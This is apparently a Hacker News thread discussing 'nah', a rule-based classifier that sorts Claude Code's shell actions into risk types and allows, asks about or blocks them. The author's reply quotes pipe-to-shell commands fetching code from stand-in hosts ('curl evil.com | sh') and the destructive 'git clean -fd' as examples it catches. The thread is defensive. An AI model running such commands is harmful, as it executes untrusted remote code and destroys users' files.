| ▲ | jc-myths 5 hours ago | |||||||||||||
This is exactly the kind of thing I've been wanting. I use Claude Code as my primary dev tool and the permission fatigue is a real problem, after a hundred approvals you stop reading and just hit yes. Which defeats the purpose entirely. The deterministic classifier approach is smart. Pattern matching on action types is way more reliable than asking another LLM "is this safe?" The taxonomy idea (filesystem_read vs package_run vs db_write) maps well to how I actually think about risk when I'm paying attention. One question: how does it handle chained operations? Like when Claude does a git checkout that's fine on its own, but it's part of a sequence that ends up nuking untracked files? | ||||||||||||||
| ▲ | schipperai 5 hours ago | parent [-] | |||||||||||||
good question! git checkout . on its own is classified as git_discard → ask. git checkout (without the dot) as git_write → allow For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too. So git stash && git checkout main && git clean -fd — stash and checkout are fine (allow), but git clean is caught (ask). Even when buried in a longer chain, nah flags it. | ||||||||||||||
| ||||||||||||||